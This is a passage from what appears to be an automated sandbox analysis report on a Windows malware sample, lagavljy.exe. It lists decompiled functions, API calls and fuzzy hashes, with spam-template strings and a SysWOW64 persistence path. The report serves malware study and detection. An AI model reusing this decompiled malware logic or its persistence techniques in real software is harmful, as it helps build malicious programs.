					_t55 = 0x1c;
				}
				E0040EE08( &_v48, _a12, _t55);
				_t50 = _a20;
				_t61 = _t60 + 0xc;
				if(_t50 <= _t57) {
					L11:
					E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
					RegDeleteValueA(_v16,  &_v48);
					RegCloseKey(_v16);
					return 0 | _t50 == _t57;
				} else {
					while(1) {
						_t58 = 0xff000;
						if(_t50 < 0xff000) {
							_t58 = _t50;
						}
						E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
						_t61 = _t61 + 0xc;
						if(RegSetValueExA(_v16,  &_v48, 0, 3, _v12, _t58) != 0) {
							break;
						}
						_v12 =  &(_v12[_t58]);
						_t50 = _t50 - _t58;
						_v8 = _v8 + 1;
						if(_t50 > 0) {
							continue;
						}
						break;
					}
					_t57 = 0;
					goto L11;
				}
			}

APIs

RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,004122F8), ref: 0040E127
RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,004122F8), ref: 0040E158
RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,004122F8,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: Value$CloseCreateDelete
String ID:
API String ID: 2667537340-0
Opcode ID: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
Instruction ID: af4a942e7328ea1ce2cdf979f73f75556816175b5134196b99f0fb832a21e1c2
Opcode Fuzzy Hash: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
Instruction Fuzzy Hash: 2F218071A00219BBDF209FA6EC89EDF7F79EF08754F008072F904A6190E6718A64DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0047E2E5, Relevance: 6.1, APIs: 4, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(80000001,0047E4F3,00000000,00000000,00000000,00020106,00000000,0047E4F3,00000000,000000E4), ref: 0047E302
RegSetValueExA.ADVAPI32(0047E4F3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,004122F8), ref: 0047E377
RegDeleteValueA.ADVAPI32(0047E4F3,?,?,?,?,?,000000C8,004122F8), ref: 0047E3A8
RegCloseKey.ADVAPI32(0047E4F3,?,?,?,?,000000C8,004122F8,?,?,?,?,?,?,?,?,0047E4F3), ref: 0047E3B1

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: Value$CloseCreateDelete
String ID:
API String ID: 2667537340-0
Opcode ID: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
Instruction ID: a9237dd821ea6555911b9d415482acd7bbbb016f76becde38ec0c9105a9c6b58
Opcode Fuzzy Hash: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
Instruction Fuzzy Hash: A2218031A0021DBBDF209FA6EC85EEF7F79EF09754F008166F908A3151E2718A55C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00403F18, Relevance: 6.0, APIs: 4, Instructions: 46
filesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F18(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct _OVERLAPPED _v24;
				long _t30;
				void* _t31;

				_v24.Offset = _v24.Offset & 0x00000000;
				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
				_t30 = _a12;
				_t31 = _a16;
				_a16 = _a16 & 0x00000000;
				_v24.hEvent = _t31;
				if(WriteFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
					L3:
					if(_t30 != _a16) {
						L5:
						return 0;
					}
					return 1;
				}
				if(GetLastError() != 0x3e5) {
					goto L5;
				}
				WaitForSingleObject(_t31, _a20);
				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
					goto L5;
				}
				goto L3;
			}

APIs

WriteFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403F44
GetLastError.KERNEL32 ref: 00403F4E
WaitForSingleObject.KERNEL32(00000004,?), ref: 00403F5F
GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F72

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
String ID:
API String ID: 3373104450-0
Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
Instruction ID: 81d5a9f64dfd66904774ebc82d2e0e48c629fa8216d99cd76bf4a5dbd4e59073
Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
Instruction Fuzzy Hash: B9010C7291110AABDF01DF90ED44BEF7B7CEB08356F104066FA01E2190D774DA558BB6

Uniqueness

Uniqueness Score: -1.00%

Function 00403F8C, Relevance: 6.0, APIs: 4, Instructions: 46
filesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F8C(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct _OVERLAPPED _v24;
				long _t30;
				void* _t31;

				_v24.Offset = _v24.Offset & 0x00000000;
				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
				_t30 = _a12;
				_t31 = _a16;
				_a16 = _a16 & 0x00000000;
				_v24.hEvent = _t31;
				if(ReadFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
					L3:
					if(_t30 != _a16) {
						L5:
						return 0;
					}
					return 1;
				}
				if(GetLastError() != 0x3e5) {
					goto L5;
				}
				WaitForSingleObject(_t31, _a20);
				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
					goto L5;
				}
				goto L3;
			}

APIs

ReadFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403FB8
GetLastError.KERNEL32 ref: 00403FC2
WaitForSingleObject.KERNEL32(00000004,?), ref: 00403FD3
GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403FE6

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
String ID:
API String ID: 888215731-0
Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
Instruction ID: 44fd539f7a3468c5635e20a1652967c761b46accf60e77792ab8a53432005efc
Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
Instruction Fuzzy Hash: A601177291110AAFDF01DF90ED45BEF3B7CEF08356F004062F906E2090D7749A549BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00474168, Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00474194
GetLastError.KERNEL32 ref: 0047419E
WaitForSingleObject.KERNEL32(?,?), ref: 004741AF
GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 004741C2

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
String ID:
API String ID: 3373104450-0
Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
Instruction ID: 6cd21fdd32cf3a26c6a17e5cbf32764d08b2b1eeb5e0549be6e7ed1b89bc91a3
Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
Instruction Fuzzy Hash: B701E972511109ABDF01EF90ED48BEF7B7CFB18356F508062F905E2150D7749AA48BB6

Uniqueness

Uniqueness Score: -1.00%

Function 004741DC, Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00474208
GetLastError.KERNEL32 ref: 00474212
WaitForSingleObject.KERNEL32(?,?), ref: 00474223
GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00474236

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
String ID:
API String ID: 888215731-0
Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
Instruction ID: b06e15920906c4831f5de18ac10cd0090a4d09c8c63611bdbf94417d2d80e48c
Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
Instruction Fuzzy Hash: B501E572511109ABDF01DF94ED84BEF7BACEB08396F1080A2F905E2151D7749E648BBA

Uniqueness

Uniqueness Score: -1.00%

Function 0047E01F, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 35stringCOMMON

Download Yara Rule

APIs

lstrcmp.KERNEL32(?,80000009), ref: 0047E04F

Strings

A, xrefs: 0047E020, 0047E025
A, xrefs: 0047E068
A, xrefs: 0047E01F

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: lstrcmp
String ID: A$ A$ A
API String ID: 1534048567-1846390581
Opcode ID: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
Instruction ID: 7f2ee6678d5a0603e3bf1b71dea25be99d0ebc2ddf26bf0d412490189efde466
Opcode Fuzzy Hash: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
Instruction Fuzzy Hash: 28F044716006529BCB308F26D8849D3B7A9FB09321B44C7ABE158D2160D3B8A994CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4C7, Relevance: 6.0, APIs: 4, Instructions: 27
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A4C7(intOrPtr _a4) {
				long _t3;
				LONG* _t8;
				long _t9;

				_t9 = GetTickCount();
				_t8 = _a4 + 0x5c;
				while(1) {
					_t3 = InterlockedExchange(_t8, 1);
					if(_t3 == 0) {
						break;
					}
					_t3 = GetTickCount() - _t9;
					if(_t3 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t3;
			}

0x0040a4dd
0x0040a4df
0x0040a4f7
0x0040a4fa
0x0040a4fe
0x00000000
0x00000000
0x0040a4e6
0x0040a4ed
0x0040a4f1
0x00000000
0x0040a4f1
0x00000000
0x0040a4ed
0x0040a504

APIs

GetTickCount.KERNEL32 ref: 0040A4D1
GetTickCount.KERNEL32 ref: 0040A4E4
Sleep.KERNEL32(00000000,?,0040C2E9,0040C4E0,00000000,localcfg,?,0040C4E0,00413588,00408810), ref: 0040A4F1
InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: CountTick$ExchangeInterlockedSleep
String ID:
API String ID: 2207858713-0
Opcode ID: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
Instruction ID: a5473328a7e7118e9aede6741b06156156ec1e7733dd8d1ec56465b12724d56e
Opcode Fuzzy Hash: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
Instruction Fuzzy Hash: 7DE0863720131567C6005BA5BD84FAA7B98AB4D761F164072FB08E3280D6AAA99145BF

Uniqueness

Uniqueness Score: -1.00%

Function 00404E92, Relevance: 6.0, APIs: 4, Instructions: 27
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E92(void* __ecx) {
				long _t2;
				void* _t7;
				LONG* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = GetTickCount();
				_t8 = _t7 + 4;
				while(1) {
					_t2 = InterlockedExchange(_t8, 1);
					if(_t2 == 0) {
						break;
					}
					_t2 = GetTickCount() - _t9;
					if(_t2 < 0x2710) {
						Sleep(0xa);
						continue;
					}
					break;
				}
				return _t2;
			}

0x00404e9c
0x00404ea6
0x00404ea8
0x00404ec0
0x00404ec3
0x00404ec7
0x00000000
0x00000000
0x00404eaf
0x00404eb6
0x00404eba
0x00000000
0x00404eba
0x00000000
0x00404eb6
0x00404ecd

APIs

GetTickCount.KERNEL32 ref: 00404E9E
GetTickCount.KERNEL32 ref: 00404EAD
Sleep.KERNEL32(0000000A,?,00000001), ref: 00404EBA
InterlockedExchange.KERNEL32(?,00000001), ref: 00404EC3

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: CountTick$ExchangeInterlockedSleep
String ID:
API String ID: 2207858713-0
Opcode ID: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
Instruction ID: 0be737a4b1ecb403dd0b6a084e6b0260aeafc6613011e157a8d43e60cd200510
Opcode Fuzzy Hash: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
Instruction Fuzzy Hash: 6AE086B620121457D61027B9FD84F966A89AB9A361F010532F70DE21C0C6AA989345FD

Uniqueness

Uniqueness Score: -1.00%

Function 00404BD1, Relevance: 6.0, APIs: 4, Instructions: 27
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404BD1(void* __ecx) {
				long _t2;
				void* _t7;
				LONG* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = GetTickCount();
				_t8 = _t7 + 0xc;
				while(1) {
					_t2 = InterlockedExchange(_t8, 1);
					if(_t2 == 0) {
						break;
					}
					_t2 = GetTickCount() - _t9;
					if(_t2 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t2;
			}

0x00404bdb
0x00404be5
0x00404be7
0x00404bff
0x00404c02
0x00404c06
0x00000000
0x00000000
0x00404bee
0x00404bf5
0x00404bf9
0x00000000
0x00404bf9
0x00000000
0x00404bf5
0x00404c0c

APIs

GetTickCount.KERNEL32 ref: 00404BDD
GetTickCount.KERNEL32 ref: 00404BEC
Sleep.KERNEL32(00000000,?,?,?,00000004,004050F2), ref: 00404BF9
InterlockedExchange.KERNEL32(-00000008,00000001), ref: 00404C02

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: CountTick$ExchangeInterlockedSleep
String ID:
API String ID: 2207858713-0
Opcode ID: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
Instruction ID: c27c4130c4fb343c81443d6f5f76baf76a02980c1ff66e5fdc0d00212ab38f61
Opcode Fuzzy Hash: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
Instruction Fuzzy Hash: FCE0867624521457D61027A66D80FA67BA89B99361F064073F70CE2190C9AAE48141BD

Uniqueness

Uniqueness Score: -1.00%

Function 004030FA, Relevance: 6.0, APIs: 4, Instructions: 23
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004030FA(LONG* _a4) {
				long _t3;
				long _t5;

				_t5 = GetTickCount();
				while(1) {
					_t3 = InterlockedExchange(_a4, 1);
					if(_t3 == 0) {
						break;
					}
					_t3 = GetTickCount() - _t5;
					if(_t3 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t3;
			}

0x0040310b
0x00403122
0x00403128
0x0040312c
0x00000000
0x00000000
0x00403111
0x00403118
0x0040311c
0x00000000
0x0040311c
0x00000000
0x00403118
0x00403131

APIs

GetTickCount.KERNEL32 ref: 00403103
GetTickCount.KERNEL32 ref: 0040310F
Sleep.KERNEL32(00000000), ref: 0040311C
InterlockedExchange.KERNEL32(?,00000001), ref: 00403128

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: CountTick$ExchangeInterlockedSleep
String ID:
API String ID: 2207858713-0
Opcode ID: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
Instruction ID: 9edc608f4d32da9f9de986fa19dd3c9deb40157c310ade5cfb00ff6fe32d5b40
Opcode Fuzzy Hash: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
Instruction Fuzzy Hash: 51E0C235200215ABDB00AF75BD44B8A6E9EDF8C762F014432F205EA1E0C9F44D51897A

Uniqueness

Uniqueness Score: -1.00%

Function 00478319, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?), ref: 004783AF
RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?), ref: 00478460

Part of subcall function 004769AC: SetFileAttributesA.KERNEL32(?,00000080), ref: 004769CE
Part of subcall function 004769AC: SetFileAttributesA.KERNEL32(?,00000002), ref: 00476A0F
Part of subcall function 004769AC: GetFileSize.KERNEL32(000000FF,00000000), ref: 00476A23

Part of subcall function 0047EE7E: GetProcessHeap.KERNEL32(00000000,?,00000000,00471DB8,?), ref: 0047EE91
Part of subcall function 0047EE7E: HeapFree.KERNEL32(00000000), ref: 0047EE98

Strings

C:\Windows\SysWOW64\shayesoq\lagavljy.exe, xrefs: 00478475, 0047848A

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: File$AttributesHeap$CloseFreeOpenProcessSize
String ID: C:\Windows\SysWOW64\shayesoq\lagavljy.exe
API String ID: 359188348-1179203262
Opcode ID: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
Instruction ID: 4aad9c5ba37ac74c4956a2acdc7ca76ae8ccdd18526737931c59f69cf80d2422
Opcode Fuzzy Hash: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
Instruction Fuzzy Hash: 4D4174B1940109BEDB20EB919D85DFF776CEB04304F14847FF508E6111FAB85A948B59

Uniqueness

Uniqueness Score: -1.00%

Function 0047AFD9, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0047AFE8
SystemTimeToFileTime.KERNEL32(?,?), ref: 0047AFF6

Part of subcall function 0047AF58: gethostname.WS2_32(?,00000080), ref: 0047AF6C
Part of subcall function 0047AF58: lstrcpy.KERNEL32(?,00410B90), ref: 0047AFCF

Part of subcall function 00473305: gethostname.WS2_32(?,00000080), ref: 00473328
Part of subcall function 00473305: gethostbyname.WS2_32(?), ref: 00473332

Part of subcall function 0047A9F3: inet_ntoa.WS2_32(00000000), ref: 0047A9F9

Strings

%OUTLOOK_BND_, xrefs: 0047B05F, 0047B064, 0047B0A7, 0047B0C6

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: Time$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
String ID: %OUTLOOK_BND_
API String ID: 1981676241-3684217054
Opcode ID: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
Instruction ID: 6f012fbff37b4e124497c51883fac69f46b63380c9c12c55eca5ec8a1462dd9f
Opcode Fuzzy Hash: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
Instruction Fuzzy Hash: 874112B290024CABDF25AFA1DC45EEF376DFB04304F14442BB92892152EA79D958CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0047943B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119sleepCOMMON

Download Yara Rule

APIs

ShellExecuteA.SHELL32(00000000,00000000,00000020,00000022,00000000,00000000), ref: 0047951F
Sleep.KERNEL32(000001F4), ref: 00479546

Strings

, xrefs: 004794C2

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: ExecuteShellSleep
String ID:
API String ID: 4194306370-3916222277
Opcode ID: 551461b966954de20ec1d41e8ed6a80588f78eac55537dc1440b17fc4f14da60
Instruction ID: 407b47c1228c660c4dadaf7721b656cd326bebced5df18b7138378a309677a9f
Opcode Fuzzy Hash: 551461b966954de20ec1d41e8ed6a80588f78eac55537dc1440b17fc4f14da60
Instruction Fuzzy Hash: 724128728083647EEB368A24C88C7E73BE49B02310F1881E7D19E97292D6BC4D828759

Uniqueness

Uniqueness Score: -1.00%

Function 00406987, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00406987(void* __ecx, void* _a4, void* _a8, intOrPtr _a12, signed int _a16) {
				long _v8;
				long _v12;
				signed int _t50;
				signed int _t53;
				int _t59;
				signed int _t60;
				long _t68;
				signed int _t74;
				void* _t78;
				void* _t85;

				_t78 = _a8;
				_t48 =  *((intOrPtr*)(_t78 + 0x3c)) + _t78;
				_t7 =  &_a16; // 0x406b2c
				_t85 = (( *( *((intOrPtr*)(_t78 + 0x3c)) + _t78 + 6) & 0x0000ffff) - 1) * 0x28 + ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x18;
				_t68 =  *(_t85 + 0x14);
				_t50 =  *_t7 - _t68;
				_v8 = _t50;
				if(_t68 >= _a12) {
					L5:
					_a16 = _a16 & 0x00000000;
				} else {
					_t74 =  *(_t85 + 0x10);
					if(_t74 == 0) {
						goto L5;
					} else {
						_v12 = _t74;
						_a16 = _t50 / _t74;
						if(_a16 < 1) {
							_a16 = 1;
						}
						_t20 =  &_a16; // 0x406b2c
						 *(_t85 + 0x10) =  *_t20 * _t74;
					}
				}
				_v8 = _v8 & 0x00000000;
				if(WriteFile(_a4, _t78, _t68,  &_v8, 0) == 0 || _v8 != _t68) {
					if(_a16 != 0) {
						 *(_t85 + 0x10) = _v12;
					}
					_t53 = 0;
				} else {
					if(_a16 == 0) {
						L13:
						_t53 = _t68;
					} else {
						 *(_t85 + 0x10) = _v12;
						while(1) {
							_v8 = _v8 & 0x00000000;
							_t59 = WriteFile(_a4, _a8 +  *(_t85 + 0x14), _v12,  &_v8, 0);
							_t60 = _v8;
							if(_t59 == 0 || _t60 != _v12) {
								break;
							}
							_t68 = _t68 + _t60;
							_t41 =  &_a16;
							 *_t41 = _a16 - 1;
							if( *_t41 != 0) {
								continue;
							} else {
								goto L13;
							}
							goto L18;
						}
						asm("sbb eax, eax");
						_t53 =  !_t60 & _t68 + _t60;
					}
				}
				L18:
				return _t53;
			}

0x0040698f
0x00406995
0x004069a7
0x004069aa
0x004069ac
0x004069af
0x004069b1
0x004069b7
0x004069e0
0x004069e0
0x004069b9
0x004069b9
0x004069be
0x00000000
0x004069c0
0x004069c4
0x004069c7
0x004069d0
0x004069d2
0x004069d2
0x004069d5
0x004069db
0x004069db
0x004069be
0x004069e4
0x004069fd
0x00406a51
0x00406a56
0x00406a56
0x00406a59
0x00406a04
0x00406a08
0x00406a3c
0x00406a3c
0x00406a0a
0x00406a0d
0x00406a10
0x00406a10
0x00406a27
0x00406a2b
0x00406a2e
0x00000000
0x00000000
0x00406a35
0x00406a37
0x00406a37
0x00406a3a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a3a
0x00406a45
0x00406a49
0x00406a49
0x00406a08
0x00406a5b
0x00406a5f

APIs

WriteFile.KERNEL32(00409A60,?,?,00000000,00000000,00409A60,?,00000000), ref: 004069F9
WriteFile.KERNEL32(00409A60,?,00409A60,00000000,00000000), ref: 00406A27

Strings

,k@, xrefs: 004069A7, 004069D5

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID: ,k@
API String ID: 3934441357-1053005162
Opcode ID: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
Instruction ID: 2e4882fff751b5905bcc38bfa2cd4d67bf9c642b42fdf425c00f27fbfd993b21
Opcode Fuzzy Hash: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
Instruction Fuzzy Hash: 3A313A72A00209EFDB24DF58D984BAA77F4EB44315F12847AE802F7680D374EE64CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0047BC63, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0047B9C2
InterlockedIncrement.KERNEL32(00413648), ref: 0047BA23
InterlockedIncrement.KERNEL32(?), ref: 0047BA7D
GetTickCount.KERNEL32 ref: 0047BB62
GetTickCount.KERNEL32 ref: 0047BB82
InterlockedIncrement.KERNEL32(?), ref: 0047BDFE
closesocket.WS2_32(00000000), ref: 0047BE9D

Strings

%FROM_EMAIL, xrefs: 0047BC66

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: CountIncrementInterlockedTick$closesocket
String ID: %FROM_EMAIL
API String ID: 1869671989-2903620461
Opcode ID: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
Instruction ID: 5c297dbfc5f2c500311b79be76a7a19945b1a25a39cf4137f29d0a154076d490
Opcode Fuzzy Hash: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
Instruction Fuzzy Hash: 60316D71500248EFDF25DFA5DC84BEE77A8EB44700F20805BFA2892251EB39DA84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00408CEE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00408CEE() {
				intOrPtr* _v8;
				intOrPtr _v12;
				long _t15;
				char _t17;
				intOrPtr _t19;
				intOrPtr* _t20;
				void* _t25;
				signed int _t31;
				signed char _t35;
				signed int _t36;
				char* _t41;
				intOrPtr* _t42;
				signed int _t45;
				void* _t49;

				_push(_t34);
				_t31 = 0;
				_t49 =  *0x413380 - _t31; // 0x0
				if(_t49 == 0) {
					L17:
					return _t15;
				}
				_t15 = GetTickCount() -  *0x413388;
				if(_t15 < 0xea60) {
					goto L17;
				}
				_t41 =  *0x413380; // 0x0
				_t17 =  *_t41;
				_t45 =  *(_t41 + 1);
				_t42 = _t41 + 5;
				_v12 = _t17;
				if(_t17 <= 0) {
					L16:
					_t15 = GetTickCount();
					 *0x413388 = _t15;
					goto L17;
				} else {
					_v8 = _t42;
					do {
						_t35 =  *_v8;
						if(_t35 != 8) {
							if(_t35 != 9) {
								_t36 = _t35;
								_t19 =  *((intOrPtr*)(0x413300 + _t36 * 4));
								if(_t19 == 0) {
									goto L12;
								}
								_t9 = _t19 + 0x34; // 0x3b10c483
								if(_t36 ==  *_t9) {
									_t13 = _t19 + 0x50; // 0x7486850
									_t20 =  *_t13;
									if(_t20 != 0) {
										 *_t20(_t45 >>  *(_t31 * 5 + _t42) & 0x00000001);
									}
									goto L16;
								}
								goto L12;
							}
							_t25 = E0040A688(_t45 >> _t35 & 0x00000001);
							L8:
							if(_t25 != 0) {
								_t6 = _v8 + 1; // 0x3cc6
								_t45 = _t45 |  *_t6;
							}
							goto L12;
						}
						_t25 = E0040A677(_t45 >> _t35 & 0x00000001);
						goto L8;
						L12:
						_v8 = _v8 + 5;
						_t31 = _t31 + 1;
					} while (_t31 < _v12);
